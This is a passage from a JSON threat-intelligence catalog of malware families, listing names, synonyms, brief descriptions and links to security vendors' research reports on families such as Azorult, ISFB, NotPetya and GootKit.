"http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/",
"http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/",
"https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/",
"https://blog.xpnsec.com/apt28-hospitality-malware-part-2/",
"https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed"
]
}
},
{
"uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d",
"value": "Lady",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://news.drweb.com/news/?i=10140&lng=en"
]
}
},
{
"uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c",
"value": "Azorult",
"description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.",
"meta": {
"synonyms": [
"PuffStealer",
"Rultazo"
],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan",
"https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/",
"https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/",
"http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html",
"https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers"
]
}
},
{
"uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1",
"value": "HiKit",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.recordedfuture.com/hidden-lynx-analysis/",
"https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware"
]
}
},
{
"uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0",
"value": "Moose",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2015/05/26/moose-router-worm/",
"http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/",
"http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/"
]
}
},
{
"uuid": "1e722d81-085e-4beb-8901-aa27fe502dba",
"value": "Cannibal Rat",
"description": "Cannibal Rat is a Python-written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in py2exe format, with the python27.dll and the Python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html"
]
}
},
{
"uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0",
"value": "htpRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.riskiq.com/blog/labs/htprat/"
]
}
},
{
"uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61",
"value": "Orcus RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors",
"https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/",
"http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/",
"https://orcustechnologies.com/"
]
}
},
{
"uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b",
"value": "Dvmap",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/"
]
}
},
{
"uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6",
"value": "Syscon",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/"
]
}
},
{
"uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e",
"value": "Sarhust",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a"
]
}
},
{
"uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed",
"value": "Zloader",
"description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor.",
"meta": {
"synonyms": [
"Zeus Terdot"
],
"type": [],
"refs": [
"https://labs.bitdefender.com/2017/11/terdot-zeus-based-malware-strikes-back-with-a-blast-from-the-past/",
"https://www.arbornetworks.com/blog/asert/great-dga-sphinx/",
"https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/"
]
}
},
{
"uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b",
"value": "Unidentified 023",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1",
"value": "mozart",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html"
]
}
},
{
"uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a",
"value": "DeriaLock",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/812601286088597505"
]
}
},
{
"uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7",
"value": "Korlia",
"description": "",
"meta": {
"synonyms": [
"bisonal"
],
"type": [],
"refs": [
"https://securitykitten.github.io/2014/11/25/curious-korlia.html",
"https://camal.coseinc.com/publish/2013Bisonal.pdf"
]
}
},
{
"uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea",
"value": "TeleRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/"
]
}
},
{
"uuid": "f371c85c-56f6-4ddf-8502-81866da4965b",
"value": "Pitou",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.tgsoft.it/english/news_archivio_eng.asp?id=884",
"https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf"
]
}
},
{
"uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027",
"value": "KillDisk",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/"
]
}
},
{
"uuid": "686a9217-3978-47c0-9989-dd2a3438ba72",
"value": "Laziok",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector",
"https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802"
]
}
},
{
"uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f",
"value": "BS2005",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/nccgroup/Royal_APT",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
]
}
},
{
"uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b",
"value": "Laoshu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html",
"https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/"
]
}
},
{
"uuid": "6f736038-4f74-435b-8904-6870ee0e23ba",
"value": "EternalPetya",
"description": "",
"meta": {
"synonyms": [
"NonPetya",
"Diskcoder.C",
"NotPetya",
"Petna",
"Nyetya",
"BadRabbit",
"nPetya",
"ExPetr",
"Pnyetya"
],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/10/bad-rabbit.html",
"https://securelist.com/from-blackenergy-to-expetr/78937/",
"https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html",
"https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/",
"https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/",
"https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b",
"https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/",
"https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/",
"http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html",
"https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/",
"http://www.intezer.com/notpetya-returns-bad-rabbit/",
"https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik",
"https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/",
"https://www.riskiq.com/blog/labs/badrabbit/",
"https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/",
"http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html",
"https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
"https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/",
"https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/",
"https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/",
"https://securelist.com/schroedingers-petya/78870/",
"https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
"https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/",
"https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/",
"https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/",
"https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4",
"https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/",
"https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer",
"https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/",
"https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/",
"https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html",
"https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html",
"https://securelist.com/bad-rabbit-ransomware/82851/"
]
}
},
{
"uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591",
"value": "DarkComet",
"description": "",
"meta": {
"synonyms": [
"Fynloski",
"klovbot"
],
"type": [],
"refs": [
"https://darkcomet.net",
"https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/",
"http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
"https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/"
]
}
},
{
"uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d",
"value": "ISFB",
"description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merged with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB for short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which was often used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB was often protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.",
"meta": {
"synonyms": [
"Gozi ISFB",
"IAP",
"Pandemyia"
],
"type": [],
"refs": [
"https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
"https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
"https://lokalhost.pl/gozi_tree.txt",
"https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
"https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245",
"https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
"http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html",
"https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
"https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
"https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based",
"https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html"
]
}
},
{
"uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859",
"value": "CMSBrute",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/the-shade-encryptor-a-double-threat/72087/"
]
}
},
{
"uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac",
"value": "Listrix",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
]
}
},
{
"uuid": "4c786624-4a55-46e6-849d-b65552034235",
"value": "Miuref",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c",
"value": "Ransomlock",
"description": "",
"meta": {
"synonyms": [
"WinLock"
],
"type": [],
"refs": [
"https://forum.malekal.com/viewtopic.php?t=36485&start=",
"https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2"
]
}
},
{
"uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154",
"value": "pirpi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/"
]
}
},
{
"uuid": "4cb8235a-7e70-4fad-9244-69215750d559",
"value": "Unidentified 045",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46",
"value": "WireX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/",
"https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/"
]
}
},
{
"uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532",
"value": "Slave",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/"
]
}
},
{
"uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3",
"value": "TinyZ",
"description": "",
"meta": {
"synonyms": [
"Catelites Android Bot",
"MarsElite Android Bot"
],
"type": [],
"refs": [
"http://blog.group-ib.com/cron"
]
}
},
{
"uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1",
"value": "RGDoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/",
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/"
]
}
},
{
"uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310",
"value": "Citadel",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.xylibox.com/2016/02/citadel-0011-atmos.html",
"http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html",
"https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/",
"https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/"
]
}
},
{
"uuid": "9a3d71b1-ce2f-4506-85c1-ec661b8f4032",
"value": "DualToy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/"
]
}
},
{
"uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b",
"value": "Magala",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/"
]
}
},
{
"uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74",
"value": "X-Tunnel",
"description": "",
"meta": {
"synonyms": [
"xaps"
],
"type": [],
"refs": [
"https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/",
"https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf",
"https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/",
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
"http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf",
"https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf"
]
}
},
{
"uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375",
"value": "OvidiyStealer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses"
]
}
},
{
"uuid": "48deadcc-1a67-442d-b181-fdaaa337c4bb",
"value": "Trump Ransom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "34e9d701-22a1-4315-891d-443edd077abf",
"value": "SpyBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "77e85a95-6a78-4255-915a-488eb73ee82f",
"value": "CockBlocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/817311664391524352"
]
}
},
{
"uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a",
"value": "Cryptorium",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/810770490491043840"
]
}
},
{
"uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70",
"value": "Ayegent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5b3af4f0-7502-4125-bf63-b393cf185a52",
"value": "FlexiSpy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/"
]
}
},
{
"uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d",
"value": "PLEAD",
"description": "",
"meta": {
"synonyms": [
"TSCookie"
],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
"https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html",
"http://www.freebuf.com/column/159865.html",
"http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html",
"https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf"
]
}
},
{
"uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a",
"value": "Sality",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf"
]
}
},
{
"uuid": "329efac7-922e-4d8b-90a9-4a87c3281753",
"value": "GootKit",
"description": "Gootkit is a banking trojan, where large parts are written in JavaScript (Node.js). It jumps to C/C++ library functions for various tasks.",
"meta": {
"synonyms": [
"Xswkit"
],
"type": [],
"refs": [
"https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/",
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669",
"https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/",
"https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/",
"https://www.us-cert.gov/ncas/alerts/TA16-336A",
"https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/",
"https://www.youtube.com/watch?v=242Tn0IL2jE",
"http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html",
"https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/",
"http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/",
"http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html",
"https://news.drweb.com/show/?i=4338&lng=en",
"https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/",
"https://www.youtube.com/watch?v=QgUlPvEE4aw",
"https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055"
]
}
},
{
"uuid": "294bb6f0-0610-47e6-a4e7-71e40cf69908",
"value": "Cpuminer",
"description": "This was observed to be pushed by IoT malware, abusing devices for Litecoin and Bitcoin mining.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/pooler/cpuminer"
]
}
},
{
"uuid": "a85b0619-ed8e-4324-8603-af211d682dac",
"value": "Ripper ATM",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/"
]
}
},
{
"uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02",
"value": "MacInstaller",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html"
]
}
},
{
"uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b",
"value": "Chapro",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
"http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a"
]
}
},
{
"uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e",
"value": "Cardinal RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412"
]
}
},
{
"uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5",
"value": "BrickerBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/",
"https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/",
"https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/",
"https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/",
"http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f",
"https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A",
"http://seclists.org/fulldisclosure/2017/Mar/7"
]
}
},
{
"uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944",
"value": "ManameCrypt",
"description": "",
"meta": {
"synonyms": [
"CryptoHost"
],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/",
"https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route"
]
}
},
{
"uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e",
"value": "Switcher",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/"
]
}
},
{
"uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d",
"value": "Dummy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x32.html"
]
}
},
{
"uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2",
"value": "Unidentified 047",
"description": "RAT written in Delphi used by Patchwork APT.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
]
}
},
{
"uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2",
"value": "Infy",
"description": "",
"meta": {
"synonyms": [
"Foudre"
],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/",
"https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/",
"https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv",
"https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/"
]
}
},
{
"uuid": "4350b52a-8100-49b5-848d-d4a4029e949d",
"value": "Bunitu",
"description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g. VIP72).",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/",
"http://malware-traffic-analysis.net/2017/05/09/index.html",
"https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/",
"https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/"
]
}
},
{
"uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b",
"value": "Joanap",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.us-cert.gov/ncas/alerts/TA18-149A",
"https://www.us-cert.gov/ncas/analysis-reports/AR18-149A",
"https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/"
]
}
},
{
"uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7",
"value": "witchcoven",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf"
]
}
},
{
"uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e",
"value": "Coreshell",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
"http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html",
"http://malware.prevenity.com/2014/08/malware-info.html"
]
}
},
{
"uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20",
"value": "SnatchLoader",
"description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/",
"https://twitter.com/VK_Intel/status/898549340121288704",
"https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/",
"https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/"
]
}
},
{
"uuid": "15dd8386-f11a-485a-b719-440c0a47dee6",
"value": "SHAPESHIFT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html"
]
}
},
{
"uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44",
"value": "Proton RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
